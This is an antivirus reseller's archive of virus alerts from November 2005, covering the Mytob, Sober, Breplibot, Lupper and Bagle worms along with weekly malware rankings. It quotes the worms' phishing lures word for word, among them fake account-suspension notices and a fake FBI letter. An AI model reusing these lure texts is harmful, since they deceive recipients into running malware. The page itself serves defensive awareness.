PRODUCTS > Computer Virus Alerts - Maintenance
Virus alerts for Nov 2005
Current virus alerts here.
Computer virus alert
By the time you receive the e-mail 'virus alert' it can be too late!
We stock the most efficient anti virus program which checks for updates hourly.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area.
Free trial antivirus

Virus Alerts Nov 2005

November 25 2005 WORM_MYTOB.MX

This memory-resident worm mytob mx spreads copies of itself as an attachment to email messages, which it sends to target addresses, using its own Simple Mail Transfer Protocol (SMTP) engine. Through this SMTP engine, it is able to easily send the said email message even without using other mailing applications, such as Microsoft Outlook.

The email message that it sends has the following details:

From: (Spoofed)

Subject: (any of the following)
? DETECTED Online User Violation
? Important Notification
? MEMBERS SUPPORT
? Notice Account limitation
? Security Measures
? WARNING MESSAGE YOUR SERVICES NEAR TO BE CLOSED
? You have successfully updated your password
? Your Account is Suspended
? Your Account is Suspended For Security Reasons
? Your password has been successfully updated
? Your Password has been updated

Message Body: (any of the following)
Dear {User Profile} Member,

Your e-mail account was used to send a huge amount of unsolicited spam messages during the recent week. If you could please take 5-10 minutes out of your online experience and confirm the attached document so you will not run into any future problems with the online service.

If you choose to ignore our request, you leave us no choice but to cancel your membership.

Virtually yours,
The {User Profile}, Support Team

===========

Dear user {User Profile},

It has come to our attention that your {User Profile}, ( x ) records are out of date. For further details see the attached document.

Thank you for using {User Profile}!
The {User Profile} Support Team
+++ Attachment: No Virus (Clean)
+++ "Name" Antivirus - www.{User Profile}.com

===========

Dear user {User Profile},

You have successfully updated the password of your {User Profile} account.

If you did not authorize this change or if you need assistance with your account, please contact customer service at: register@{User Profile}.com

Thank you for using {User Profile}!
The {User Profile} Support Team
+++ Attachment: No Virus (Clean)
+++ "Name" Antivirus - www. {User Profile}.com

===========

Dear {User Profile} Member,

We have temporarily suspended your email account {User Profile}. This might be due to either of the following reasons:
1. A recent change in your personal information (i.e. change of address).
2. Submiting invalid information during the initial sign up process.
3. An innability to accurately verify your selected option of
subscription due to an internal error within our processors.
See the details to reactivate your {User Profile} account.
Sincerely,The Support Team
+++ Attachment: No Virus (Clean)
+++ {User Profile}Antivirus www.{User Profile}

NOTE: {User Profile}, is equal to the computer's Domain User Name

Attachment: (any of the following file names)
? accepted-password
? account-details
? account-info
? account-password
? account-report
? approved-password
? documeng
? email-details
? email-password
? important-details
? new-password
? password
? readme
? updated-password

This worm also propagates via network shares. It searches for available shared folders within the network and attempts to drop copies of itself into these shares. It also generates random IP addresses and attempts to drop copies of itself into the said addresses' default shares. It uses the account details of the currently logged user to gain access to password-protected shares.

It has backdoor capabilities, which enable a remote malicious user to perform commands on the affected system, thus compromising system security.

It runs on Windows NT, 2000, and XP.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

Top 10 Most Prevalent Global Malware
(from November 18 to November 24, 2005)

1. WORM_MYTOB.MX
2. WORM_SOBER.AG
3. SPYW_GATOR.F
4. WORM_NETSKY.P
5. HTML_NETSKY.P
6. WORM_MOFEI.B
7. PE_PARITE.A
8. TSPY_SMALL.SN
9. TROJ_ISTBAR.FN
10. ADW_LOP.A

November 21 2005 WORM_SOBER.AG

We have received several infection reports indicating that this malware is spreading in the USA, Belgium, Canada, Brazil, and New Zealand.

This memory-resident worm propagates by attaching a copy of itself to an email message, which it sends to target recipients using its own Simple Mail Transfer Protocol (SMTP) engine. Since it's email propagation does not require any user intervention, the user is often unaware that this worm is sending out email messages.

The email it sends out has the following details:

From: {Email address generated by this worm}

Subject: (any of the following)
• hi,_ive_a_new_mail_address
• Mail delivery failed
• Registration Confirmation
• smtp mail failed
• Spam: Registration Confirmation
• Your Password
• Your IP was logged
• Paris_Hilton_&_Nicole_Richie
• You visit illegal websites

Message body: (any of the following)
hey its me, my old address dont work at time. i dont know why?!
in the last days ive got some mails. i' think thaz your mails but im not sure!
plz read and check ...
cyaaaaaaa

---

This is an automatically generated Delivery Status Notification.

SMTP_Error []
I'm afraid I wasn't able to deliver your message.
This is a permanent error; I've given up. Sorry it didn't work out.
The full mail-text and header is attached

---

Account and Password Information are attached!
***** Go to: http://www.{random}.com
***** Email: {random}.com

---

Dear Sir/Madam,

we have logged your IP-address on more than 30 illegal Websites.
Important:
Please answer our questions!
The list of questions are attached.

Yours faithfully,
Steven Allison

*** Federal Bureau of Investigation -FBI-
*** 935 Pennsylvania Avenue, NW, Room 3220
*** Washington, DC 20535
*** phone: (202) 324-3000

---

Account and Password Information are attached! ---

The Simple Life:
View Paris Hilton & Nicole Richie video clips , pictures & more
Download is free until Jan, 2006!
Please use our Download manager.

Attachment: (any of the following)
• mailtext.zip
• mail.zip
• reg_pass.zip
• mail.zip
• reg_pass-data.zip
• question_list.zip
• list.zip
• downloadm
• mail_body.zip

The attached .ZIP file contains the copy of this worm using the following file name:
File-packed_dataInfo.exe

When executed, it displays a fake error message box in order to trick a user into thinking that the file did not properly execute.

This worm searches the process list of the affected system for mrt.exe, the Microsoft Windows Malicious Software Removal Tool process. If found, it terminates the said process thus making the system more vulnerable to malicious attacks.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

November 18 2005 Trojans Utilise Kernel-mode Rootkit - BKDR_BREPLIBOT.A

In the past week, much attention has been given to the BREPLIBOT family of backdoor-trojans. This Trojan exploits the Sony Digital Rights Management rootkit-and this new malware also targets a specific audience – the business community. Arriving as an attachment in an email, the malware pretends to come from a reputable business magazine, asking the businessman to verify his/her "picture" (apparently attached to the email) to be used for the December issue. However, rather than presenting a picture, executing the attachment installs the Trojan.

The issue is less about the Trojan than it is about the underlying rootkit technology utilized by them. This is because the rootkit utilized by the BKDR_REPLIBOT Trojans is a 'kernel-mode' program, which can be used for more dramatic malicious purposes than 'user-mode' programs.

“We don’t blame Sony for attempting to exercise its right to manage its digital property”. “However, what’s important to understand is that this technology can now be used by malicious malware writers to hide and spread their creations. These writers include those who might not know how to write their own rootkits – but now they don’t have to.”

May we add a strong recommendation that businesses with the need to protect their intellectual property look into other possible solutions, such as building a level of security commitment into contractual agreements with technology partners, especially when those partners are developing additional DRM (digital rights management) tools.

"The protection of Corporate Intellectual Property in the digital age is a complex and serious matter for any business. This situation emphasizes the growing complexity of corporate security, both from an IT and business continuity standpoint. It makes clear the need for a consolidation of business and security as one unified initiative."

The primary danger of kernel-mode drivers is that they have the capability to modify or destroy any other data structure in the memory including the operating system code, itself. This is due to the fact that kernel-mode has inherently been granted the highest level of access in a system, and therefore can be utilized to perform nearly any task, including overwriting any other program or data in the system. They add that the objective of rootkits is to conceal the existence of other programs. Instead, they are frequently used to conceal spyware or other malware. And since rootkits are readily available, we expect to see rootkit detection numbers rise.

We are reminding users to remain vigilant. As a precautionary measure, every email should be scrutinized, especially those containing attachments, or those from unexpected or unknown sources, and additionally, they should ensure their security solutions are fully updated. We also recommends that technical users and IT staff educate themselves regarding the growing rootkit threat.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

Top 10 Most Prevalent Global Malware
(from November 11 to November 17, 2005)

1. JAVA_BYTEVER.A
2. SPYW_DASHBAR.300
3. SPYW_GATOR.F
4. WORM_NETSKY.P
5. HTML_NETSKY.P
6. WORM_MOFEI.B
7. PE_PARITE.A
8. TSPY_SMALL.SN
9. TROJ_ISTBAR.FN
10. ADW_LOP.A

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

November 11 2005 Worms Create their own Bot Network - ELF_LUPPER.A & ELF_LUPPER B

Earlier this week, researchers at antivirus and content security firms warned users to remain extra vigilant regarding the patching of systems, following the recent family of worms which targeted the Linux operating system. ELF_LUPPER.A and ELF_LUPPER.B, which were discovered at the beginning of the week, were built to exploit vulnerabilities in certain web applications, rather than anything inherent in the Linux kernel. Though the worms were compiled to attack Linux, it is important to note that the source code could potentially be recompiled for other systems that are related to Linux.

According to analysists, both worms utilized the same set of vulnerabilities, especially the XML-RPC which was first made public on June 27, 2005. The corresponding exploits to these vulnerabilities were posted a month later to a well-known public Web site for viewing and posting new exploits. These were network worms, capable of self-propagation, with no interaction from the user necessary.

These network worms exploited vulnerabilities that enabled them to stealthily connect to a Web site, where they could download and execute copies of themselves to a victim’s system. The worms focused on building their own bot network, which can give the writer more information that could be utilized to launch a larger attack in the future.

Both worms utilized the base code of the Linux Slapper worm, which was discovered in September, 2002. The writer(s) of the ELF_LUPPER worms removed the SSL exploit, replacing it with two known vulnerabilities – AWStat and XML-RPC. These worms are believed to be related to a hacker tool, HKTL_CALLBACK, discovered November 3, 2005. The probable purpose of the hack tool was to bypass victims’ firewalls and surreptitiously collect information to aid the worm attacks.

We advise users to ensure their systems contain the most recent security patches and to remain vigilant, regardless of which operating system they use. “It’s important to remember that this is open source, so it may be relatively easy to supplement the current malware with additional exploit code, capabilities, etc., thereby generating future variants”.

Even though Linux is still second to Windows, with regards to customer usage, users are strongly advised to be aware of the security issues concerning their systems. Security experts added that this attack is really just an example that nearly every system has vulnerabilities, and that users should remain vigilant at all times, irrelevant of their OS.

Security experts recommend that users take the following measures to protect against the ELF_LUPPER family of worms as well as other attacks:

  • Ensure your system is patched with the most current system update
  • Ensure your antivirus definitions are updated. NOD32 updates automatically and is regarded by Virus Bulletin as the best antivirus available.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

Top 10 Most Prevalent Global Malware
(from November 04 to November 10, 2005)

1. TROJ_BAGLE.AB
2. WORM_NETSKY.P
3. JAVA_BYTEVER.A
4. SPYW_DASHBAR.300
5. SPYW_GATOR.F
6. HTML_NETSKY.P
7. TROJ_ISTBAR.FN
8. PE_PARITE.A
9. TSPY_SMALL.SN
10. WORM_MOFEI.B

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

November 04 2005 More bagle worms

Researchers have discovered two new variants of the notorious BAGLE family of worms. Although WORM_BAGLE.BQ and WORM_BAGLE.BS have not caused a high number of infections, they are utilizing a relatively new technique – adding a downloader between the Trojan and worm components as part of a “tri-component” technique – which enables a far more dynamic spreading mechanism and a higher potential for damage. Although security experts first saw this technique in mid-September with a series of other BAGLE variants, its re-emergence suggests that this could become more prominent – and destructive – in the future.

The URLs to which the code points are continuously changing to prevent the downloader from being detected. At times they appear to be down, then they are brought back up again. This appears to give the author enough time to repack the code, thereby modifying the identifying file.

Security experts warn that these new variants could possibly mark the beginning of a concerning trend. A future variant with a slightly better refined propagation technique – including the use of a packer with polymorphic capabilities and utilizing an established Bot network – could lead to a significant number of infections.

Contact Us for a one month free antivirus trial.
Add "Virus Trial" to the Comments area. Free trial antivirus

Top 10 Most Prevalent Global Malware
(from October 28 to November 03, 2005)

1. JAVA_BYTEVER.A
2. SPYW_DASHBAR.300
3. WORM_NETSKY.P
4. SPYW_GATOR.F
5. HTML_NETSKY.P
6. TROJ_BAGLE.AB
7. TSPY_SMALL.SN
8. WORM_MOFEI.B
9. ADW_LOP.A
10. PE_PARITE.